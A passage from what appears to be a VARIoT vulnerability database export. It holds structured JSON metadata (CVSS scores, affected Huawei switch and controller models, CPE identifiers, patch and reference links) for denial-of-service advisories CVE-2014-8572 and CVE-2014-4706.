                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-8572",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2016-03649",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-76517",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2014-8572",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2014-8572",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-03649",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201605-577",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-76517",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service. plural Huawei Product software includes VRP Special to device SSH Packets are sent and service operation is interrupted (DoS) There are vulnerabilities that are put into a state.By a remote attacker, VRP Special to device SSH Packets are sent and service operation is interrupted (DoS) There is a possibility of being put into a state. HuaweiAC6605 is a wireless access controller product from China's Huawei company. A security vulnerability exists in the SSH module of several Huawei products. The vulnerability is caused by the lack of valid verification of a domain in the message content when the program processes the message. This vulnerability could be exploited by an attacker to cause a device service interruption using the VRP platform. The following products and versions are affected: Huawei AC6605 V200R001C00 Version, AC6605 V200R002C00 Version, ACU V200R001C00 Version, V200R002C00 Version, S2300/ S3300/S2700/ S3700 V100R006C05 and previous versions, S5300/ S5700/S6300/ S6700 V100R006 Version, V200R001 Version, V200R002 Version, V200R003, V200R005C00SPC300 and earlier versions, S7700/S9300/S9300E/S9700 V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions",
      sources: [
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2014-8572",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   id: "VAR-201704-0463",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
      ],
      trust: 1.2565105382926829,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
      ],
   },
   last_update_date: "2023-12-18T13:08:53.241000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20141010-01-VRP",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
         },
         {
            title: "Patches for various Huawei Product Denial of Service Vulnerabilities (CNVD-2016-03649)",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/76517",
         },
         {
            title: "Multiple Huawei Product security vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61890",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-373182",
         },
         {
            trust: 1.2,
            url: "http://www.huawei.com/cn/psirt/security-advisories/hw-373183",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8572",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2014-8572",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-05-27T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            date: "2017-04-02T20:59:00.423000",
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            date: "2016-05-23T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-05-27T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-03649",
         },
         {
            date: "2017-04-11T00:00:00",
            db: "VULHUB",
            id: "VHN-76517",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
         {
            date: "2017-04-11T01:11:55.313000",
            db: "NVD",
            id: "CVE-2014-8572",
         },
         {
            date: "2016-05-23T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Service disruption in product software  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2014-008290",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201605-577",
         },
      ],
      trust: 0.6,
   },
}

var-201704-0385
Vulnerability from variot

Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow. plural Huawei Campus The product software contains a buffer error vulnerability.Service operation interruption (DoS) An attack may be carried out. Huawei's Campus switch is a series of switches introduced by Huawei. An attacker can exploit this vulnerability by using malformed packets to cause the device to restart abnormally. The following products and versions are affected: Huawei Campus S3700HI V200R001C00SPC300 Version; Campus S5700 V200R002C00SPC100 Version; Campus S7700 V200R003C00SPC300 Version, V200R003C00SPC500 Version; LSW S9700 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S2350 V200R003C00SPC300 Version; S2750 V200R003C00SPC300 Version; S5300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S5700 V200R001C00SPC300 Version, V200R003C00SPC300 Version; S6300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S6700 S3300HI V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S7700 V200R001C00SPC300 Version; S9300 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S9300E V200R003C00SPC300 Version , V200R003C00SPC500 version

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0385",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s6700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "lsw s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s2350",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s2750",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "campus s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "lsw s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s7700 v200r001c00spc300",
            scope: null,
            trust: 1.2,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s3700hi",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s3300hi",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "campus s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "lsw s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "campus s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "campus lsw s9700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s2350",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s2750",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s3300hi",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s3700hi",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5300",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s5700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6300",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s6700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s7700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9300",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s9300e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "s9300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s3700hi v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 s3300hi v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "lsw s9700 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "lsw s9700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "lsw s9700 v200r003c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300e v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s7700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s7700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2750 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2350ei v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-05106",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008276",
         },
         {
            db: "NVD",
            id: "CVE-2014-4706",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-211",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:campus_s3700hi_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s3700hi:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s3300hi_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s3300hi:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:lsw_s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
